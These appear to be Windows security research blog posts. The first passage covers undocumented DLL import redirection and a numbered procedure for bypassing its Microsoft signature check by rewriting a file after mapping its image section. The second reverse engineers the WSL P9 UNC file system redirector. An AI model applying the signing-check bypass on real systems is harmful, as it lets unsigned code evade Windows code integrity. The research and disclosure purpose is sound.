This function allows you to disable redirection for a specific import on a DLL. Index is the offset into the redirection table for the matched import, so you can disable redirection for certain imports for certain DLLs.

In conclusion, this is an interesting feature Microsoft added to Windows to support a niche edge case, and then seems to have not officially documented it. Nice! However, it doesn’t look like it’s useful for general purpose import redirection as normal applications require the file to be signed by Microsoft, presumably to prevent this being abused by malicious code. Also there's no trivial way to specify the option using CreateProcess and calling NtCreateUserProcess doesn't correctly initialize things like SxS and CSRSS connections.

.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.

Now if you’ve bothered to read this far, I might as well admit you can bypass the signature check quite easily. Digging into where the DLL loading fails we find the following code inside LdrpMapDllNtFileName:

if ((LoadFlags & 0x1000000) && !NtCurrentPeb()->IsPackagedProcess)
{
  status = LdrpSetModuleSigningLevel(FileHandle, 8);
  if (!NT_SUCCESS(status))
    return status;

}

If you look back at the original call to LdrpLoadDll you'll notice that it was passing flag 0x1000000, which presumably means the DLL should be checked against a known signing level. The check is also disabled if the process is in a Packaged Process through a check on the PEB. This is why the load works in a Packaged Application, this check is just disabled. Therefore one way to get around the check would be to just use a Packaged App of some form, but that's not very convenient. You could try setting the flag manually by writing to the PEB, however that can result in the process not working too well afterwards (at least I couldn't get normal applications to run if I set the flag).

What is LdrpSetModuleSigningLevel actually doing? Perhaps we can just bypass the check?

NTSTATUS LdrpSetModuleSigningLevel(HANDLE FileHandle, BYTE SigningLevel) {
    DWORD Flags;
    BYTE CurrentLevel;
    NTSTATUS status = NtGetCachedSigningLevel(FileHandle, &Flags, &CurrentLevel);
    if (NT_SUCCESS(status))
        status = NtCompareSigningLevel(CurrentLevel, SigningLevel);
    if (!NT_SUCCESS(status))
        status = NtSetCachedSigningLevel(4, SigningLevel, &FileHandle);
    return status;

}

The code is using a the NtGetCachedSigningLevel and NtSetCachedSigningLevel system calls to use the kernel's Code Integrity module to checking the signing level. The signing level must be at least level 8, passing in from the earlier code, which corresponds to the "Microsoft" level. This ties in with everything we know, using a Microsoft signed DLL loads but a signed non-Microsoft one doesn't as it wouldn't be set to the Microsoft signing level.

The cached signature checks have had multiple flaws before now. For example watch my UMCI presentation from OffensiveCon. In theory everything has been fixed for now, but can we still bypass it?

The key to the bypass is noting that the process we want to load the DLL into isn't actually running with an elevated signing level, such as Microsoft only DLLs or Protected Process. This means the cached image section in the SECTION_OBJECT_POINTERS structure doesn't have to correspond to the file data on disk. This is effectively the same attack as the one in my blog on Virtual Box (see section "Exploiting Kernel-Mode Image Loading Behavior").

Therefore the attack we can perform is as follows:

1. Copy unsigned Import Redirection DLL to a temporary file.
2. Open the temporary file for RWX access.
3. Create an image section object for the file then map the section into memory.
4. Rewrite the file with the contents of a Microsoft signed DLL.
5. Close the file and section handles, but do not unmap the memory.
6. Start a process specifying the temporary file as the DLL to load in the RTL_USER_PROCESS_PARAMETERS structure.
7. Profit?

Copy of CMD running with the CreateProcess hook installed.

Of course if you're willing to write data to the new process you could just disable the check, but where's the fun in that :-)

Digging into the WSL P9 File System

Windows 10 version 1903 is upon us, which gives me a good reason to go looking at what new features have been added I can find bugs in. As it's clear people seem to appreciate fluff rather than in-depth technical analysis I thought I'd provide a overview of my process I undertook to look at one new feature, the P9 file system added for the Windows Subsystem for Linux (WSL). The aim is to show my approach to analyzing a feature with the minimum amount of reverse engineering, ideally with no disassembly.

Background

When WSL was first introduced it had a pretty poor story for interoperability between the Linux instance and the host Windows environment. In the early versions the only, officially supported, way to interop was through DrvFS which allows you to mount local Windows drives into the Linux environment. This story has changed over time such as adding support to start Windows executables from Linux and better NTFS case-sensitivity support (which I blogged about already).

But one fairly large pain point remained, accessing Linux files from Windows applications. You could do it, the files are stored inside the distro's package directory (%LOCALAPPDATA%\Packages\DISTRO\LocalState\rootfs), so you could open them directly. However WSL relies on various tricks to deal with the mismatch between Windows and Unix-style filesystem semantics, such as storing the UID/GID and file permission bits in extended attributes. Modifying these files using an unenlightened Windows application could result in corruption of the file state which in the worse case could break the distro.

With the release of 1903 the WSL team (if such a thing exists) looks to be trying to solve this problem once and for all. This blog introduced the new feature, accessing Linux files via a UNC path. I felt this warranted at least a small amount of investigation to see how it works and whether there's any quick wins or low-hanging fruit.

Understanding the Feature

The first thing I needed was to setup a x64 version of 1903 in a Hyper-V VM. I then made the following changes, which I would always do regardless of what I end up using the VM for:
  • Disabled SecureBoot for the VM.
  • Enabled kernel debugging through BCDEDIT. Note that I tend to be paranoid enough to disable NICs in the VM (and my success of setting up alternative debug transports is mixed) so I resort to serial debugging over a named pipe. Note that for Gen 2 Hyper-V VMs you can't add a serial port from the UI, instead you need use the Set-VMComPort PowerShell cmdlet.
  • Install my tooling, such as NtObjectManager and SysInternals suite, especially Process Monitor.
  • Enabled the Windows Subsystem for Linux feature.
  • Install a distro of choice from the Windows Store. Debian is the most lightweight, but any will do for our purposes. Note that you don't need to login to the Store to get the distro, though the app will do its best to convince you otherwise. Don't listen to its lies.
With a VM in hand we can now start the investigation. The first thing I do is take any official information at face value and use that to narrow the scope. For example reading the official blog post I could determine the following:
  • The feature uses the Plan 9 Filesystem Protocol to access files.
  • The files are accessed via the UNC path \\WSL$\DISTRO but only when the distro is running.
  • The P9 server is hosted in the init process when the distro starts.
  • The P9 server uses UNIX sockets for communication.
Based on those observations the first thing I want to do is try and find how the UNC path is implemented. The rationale for starting at the UNC path is simple, that's the only externally observable feature described in the blog post. Everything else, such as the use of P9 or UNIX sockets could be incorrect. I'm not expecting the blog post to outright lie about the implementation, but there's sometimes more important details to get right than others. It's worth noting here that you should increase your skepticism of a feature's technical description the older the blog post is as things can and will change.

If we can find how the UNC path is implemented that should also lead us to whether P9 is used as well as what transport the feature is using. An important question is whether these files are really accessed via the UNC path, which would imply kernel support, or is it only in Explorer? This is important to allow us to track down where the implementation lies. For example it's possible that if the feature only works in Explorer it could be implemented as a shell extension, similar to how MTP/PTP is supported.

To determine whether its a kernel driver or a shell extension it's as simple as opening the UNC path using the lowest possible function, which in this case means calling a system call. Invoking a system call will also eliminate the chance the WSL UNC path is implemented using some new feature added to the Win32 APIs. As my NtObjectManager module directly calls the NtOpenFile system call we can use that to do the test. I ran the following PowerShell command to check on the result:

$f = Get-NtFile \??\UNC\wsl$\Debian\bin\bash

This command successfully opens the BASH executable file. This is a clear indication that we now need to look at the kernel to find the driver responsible for implementing the UNC path. This is commonly implemented by writing a Network Mini-Redirector which handles a lot of the setup with the Multiple UNC Provider (MUP) and the IO Manager.

At this point the assumption would be the mini-redirector would be implemented in the LXCORE system driver which implements the rest of WSL. However a quick check of the imports with the DUMPBIN tool, shows the driver doesn't import anything from RDBSS which would be crucial for the implementation of a mini-redirector. 

To find the actual driver name I'll go for the simplest, brute force approach, just list all drivers which import RDBSS and see if any are obvious candidates based on name. You could achieve this in one of many ways, for example you could implement a PE file parser and check the imports, you could script DUMPBIN, or you could just GREP (well FINDSTR) for RSBSS, which is what I'll do. I ran the following:

c:\> findstr /I /M rdbss c:\windows\system32\drivers\*.sys
c:\windows\system32\drivers\csc.sys
c:\windows\system32\drivers\mrxdav.sys
c:\windows\system32\drivers\mrxsmb.sys
c:\windows\system32\drivers\mrxsmb20.sys
c:\windows\system32\drivers\p9rdr.sys
c:\windows\system32\drivers\rdbss.sys
c:\windows\system32\drivers\rdpdr.sys

In the FINDSTR command I just list all drivers which contain the case insensitive string RDBSS and print out the filename only (unless you enjoy terminal beeps). The result of this process is a clear candidate P9RDR. This also likely confirms the use of the P9 protocol, though of course we should never jump the gun on this. 

We could throw the driver into a disassembler at this point and start RE, but I don't want to go there just yet. Instead, in the spirit of laziness I'll throw the driver into STRINGS and get out all printable debug string information, of which there's likely to be some. I typically use the SysInternals STRINGS rather than the BINUTILS one, just as I usually always have it installed on any test system and it handles Unicode and ANSI strings with no additional argument. Below is some of the output from the tool:

c:\> strings c:\Windows\system32\drivers\p9rdr.sys
...
\Device\P9Rdr
P9: Invalid buffer for P9RDR_ADD_CONNECTION_TARGET_INPUT.
P9: Invalid share name in P9RDR_ADD_CONNECTION_TARGET_INPUT.
P9: Invalid AF_UNIX path in P9RDR_ADD_CONNECTION_TARGET_INPUT.
P9: Invalid share name in P9RDR_REMOVE_CONNECTION_TARGET_INPUT.
...
\wsl$

We can see a few things here, firstly we can see the WSL$ prefix, this is a good indication that we're in the right place. Second we can see a device name which gives us a good indication that there's expected to be communication from user-mode to kernel mode to configure the device. And finally we can see the string "AF_UNIX" which ties in nicely with our expectation that Unix Sockets are being used.

One this which is missing from the STRINGS output is any indication of the Unix socket file name being used. Unix sockets can be used in an "abstract" fashion, however typically you access the socket through a file path on disk. It's most likely that a file is how the driver and communicates with the socket (I don't even know if Windows supports the "abstract" socket names). Therefore if it is indeed using a file it's not a fixed filename. The kernel has support for a socket library so again maybe this would be the place we could go disassembling, but instead we'll just do some dynamic analysis using PROCMON.

In order to open a socket from a file there must be some attempt to call the IO Manager to open it, this in turn would likely be detectable using PROCMON's filter driver. We can therefore make the following assumptions:

  • The file open can be detected in PROCMON.
  • The socket file will be opened in the context of the first process to open the UNC path.
  • The open request will have the P9RDR driver on the call stack.
The first assumption is a general problem with PROCMON. There are ways of opening files, such as inside another filter driver which cannot be detected by PROCMON as it never receives the request. However we'll assume that is can be detected, of course if we don't find it we might have to resort to disassembly or kernel debugging after all. 

The second assumption is based on the fact the WSL distribution isn't always running, therefore any Unix socket file would only be opened on demand, and for reasons of laziness is likely to be in the same process that first makes the request. It could push the request to a background thread, but it seems unlikely. By making this assumption we can filter PROCMON to only show open file requests from a known process.

The final assumption is there to filter down all possible open file requests to the ones we care about. As the driver is a mini-redirector the call chain is likely to be IO Manager to MUP to RDBSS to P9RDR to UNIX SOCKET. Therefore we only care about anything which goes through the driver of interest. This assumption is more important if assumption 2 is false as it might mean that we couldn't filter to a specific process, but we'll go with it anyway on the basis that it's useful technique to learn.

Based on the assumptions we can set PROCMON's filters for a specific process (we'll use PowerShell again) and filter for all CreateFile operations. The Windows kernel doesn't specifically differentiate between open and create calls (open is a specific case of create) so PROCMON doesn't either.

PROCMON Filter View showing filtering on powershell process name and CreateFile operation.

What about the call stack? As far as I can tell you can't filter on the call stack directly, instead we'll do something else. But first gather a trace of a PowerShell session where you execute the Get-NtFile command show earlier in this blog post. Now we want to save the trace as an XML file. Why an XML file? First, the XML format is easy to access, unlike the native PML format. However, the real answer is shown in the following screenshot.

PROCMON Save Dialog showing options for XML output including stack traces.

The screenshot shows the options for exporting to XML. It allows us to save the call stacks for all trace events. It will even resolve symbols, however as we're only interested in the module on the stack not the name we can select to include the stack trace, but not symbol resolving. With an exported trace we can now filter the calls based using a simple XPath expression. The following is a simple PowerShell script to run the XPath query.

$xml = [xml]$(Get-Content "LogFile.XML")
$xml.SelectNodes("//event[stack/frame[contains(path, 'p9rdr')]]/Path[text()]")

The script is pretty simple, if you "cast" a text file to an XML object (using [xml]) PowerShell will create an XML DOM Document from the text. With the Document object we can now call SelectNodes with an appropriate XPath. In this case we just want to select all Path of all events which have a stack trace frame containing the P9RDR module. Running this script against the capture results in one hit:

%LOCALAPPDATA%\Packages\DISTRO\LocalState\fsserver

DISTRO is the name of the Store package you installed the distro from, for example Debian is installed into TheDebianProject.DebianGNULinux_76v4gfsz19hv4. With a file name of fsserver it seems pretty clear what the file is for, but just to check lets open the event back in PROCMON and look at the call stack.

PROCMON call stack opening fsserver showing AFUNIX driver and P9RDR.

I've highlighted areas of interest, at the top there's the calls through the AFUNIX driver, which demonstrates that the file is being opened due a UNIX socket connection being made. At the bottom we can see a list of calls in the P9RDR driver. As symbol resolving is enabled we can use the symbol information to target specific areas of the driver for reverse engineering. Also now we know the path we can put this back into PROCMON as a filter and from that we can confirm that it's the init process which is responsible for setting up the file server.

In conclusion we can at least confirm a few things which we didn't know before.
  • The handling of the UNC paths is handled entirely in kernel mode via a mini-redirector. This makes the file system more interesting from a security perspective as it's parsing arbitrary user data in the kernel.
  • The file system uses UNIX sockets for communication, this is handled by the kernel driver and the main init process.
  • The socket protocol is presumably P9 based on the driver name, however we've not actually confirmed that to be true.
There's of course still things we'd want to know:
  • How is the UNC mappings configured? Via the device driver?
  • Is the protocol actually P9, if so what information is being passed across?
  • How well "fuzzed" are the protocol parsers.
  • Does this file system have any other interesting behaviors.
Some of those things will have to wait for another blog post.









❌